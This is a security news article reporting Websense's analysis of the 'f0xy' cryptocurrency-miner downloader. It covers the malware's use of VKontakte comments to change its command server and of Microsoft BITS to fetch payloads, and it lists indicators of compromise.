Security Affairs
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 104|Security Affairs newsletter Round 584 by Pierluigi Paganini – INTERNATIONAL EDITION|U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 104|Security Affairs newsletter Round 584 by Pierluigi Paganini – INTERNATIONAL EDITION|U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|
Advertisement

Ad Placeholder

Full Width × 90

Malware

f0xy CPUminer malware improved with evasion techniques

Researchers at Websense are investigating on the evolution of the financial ‘f0xy’ malware which is improved with new interesting features. Security experts at Websense have spotted a new strain of malware dubbed “f0xy” that leverages legitimate websites and web services in order to run malicious activities. A first sample of f0xy discovered by Websense is dated January 13, […]

f0xy CPUminer malware improved with evasion techniques

Researchers at Websense are investigating on the evolution of the financial ‘f0xy’ malware which is improved with new interesting features.

Security experts at Websense have spotted a new strain of malware dubbed “f0xy” that leverages legitimate websites and web services in order to run malicious activities. A first sample of f0xy discovered by Websense is dated January 13, 2015, but the experts confirmed that the malware has been improved since then. f0xy originally worked only on Windows Vista and later versions Microsoft OS, meanwhile recent variant are effective also on Windows XP.

The name f0xy was assigned because the presence of this particular string has been found in its executables and the registries it creates.

File Names
%appdata%\Microsoft\svchost.exe
%appdata%\Microsoft\f0xyupdate.exe
%appdata%\Microsoft\Bot_ID
Registry Keys
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Name: f0xy

f0xy code

The f0xy  malware is able to dynamically change its command-and-control (C&C) and download and execute arbitrary files, the authors have dedicated particular attention to the techniques of evasion to hide the malicious code to victims and security firms.

A first sample of the dropper used by the malware was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by the researchers,  at this moment the detection rate is slightly increasing (24/57 ), but it’s still low.

“Websense Security Labs have discovered a new and emerging malware downloader that employs evasion techniques and downloads a cryptocurrency miner. The new malware, which we have named ‘f0xy’, is able to dynamically change its command-and-control (C&C), and download and execute arbitrary files. More interestingly, f0xy’s evasion tactics include leveraging the popular Russian social networking site VKontakte, and employing Microsoft’s Background Intelligent Transfer Service to download files.” Websense researcher Nick Griffin explained in a blog post.

Very interesting the technique adopted by f0xy to dynamically change the C&C, the operators use an encoded string posted through a specific VKontakte profile pointed by the malware. The URL of the command & control server is posted as a comment by this profile.

Once the f0xy downloader finds itself on a machine it exploits the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. The choice is very effective because BITS is used by Microsoft systems for transferring files between a client and a server using idle network bandwidth, a process that was not considered suspicious by antivirus solutions.

“The f0xy downloader calls upon bitsadmin.exe to download its payloads, which is the Microsoft Background Intelligent Transfer Service (BITS). BITS provides a way of using idle bandwidth to perform file transfers, meaning that bandwidth requirements from other applications are not interrupted or interfered with. Many Windows services rely upon this service, including Windows Update and Windows Defender.” continues the post.

The experts confirmed the financial motivation of the operators behind f0xy campaign, the f0xy variant uncovered by Websense is CPU Miner working on 64-bit version architecture. Threat actors use the CoinMine.pw mining pool to coordinate mining activities run by the infected machines.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Pierluigi Paganini

(Security Affairs – f0xy, malware)